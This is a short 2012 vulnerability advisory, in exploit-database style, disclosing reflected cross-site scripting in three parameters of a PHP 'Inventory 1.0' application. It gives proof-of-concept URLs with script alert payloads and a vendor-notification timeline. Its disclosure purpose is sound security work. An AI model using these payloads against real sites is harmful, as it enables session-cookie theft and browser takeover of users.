# Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities
# Date: 10/19/12
# Author: G13
# Twitter: @g13net
# Software Site: https://github.com/farevalod/inventory
# Version: 1.0
# Category: webapp (php)
# dc585

##### ToC #####

0x01 Description
0x02 XSS
0x03 Vendor Notification

##### 0x01 Description #####

PHP + SQL Inventory tracking system

##### 0x02 XSS #####

The Inventory application has multiple pages and parameters that are
vulnerable to cross-site scripting. This
vulnerabilities could be used to steal session cookies or take control
of a client's browser.

-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]

-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</
script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</scri
pt>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</scrip
t>

##### 0x03 Vendor Notification #####

10/19/12 - Vendor Notified
10/26/12 - No response, disclosure

[ reply ]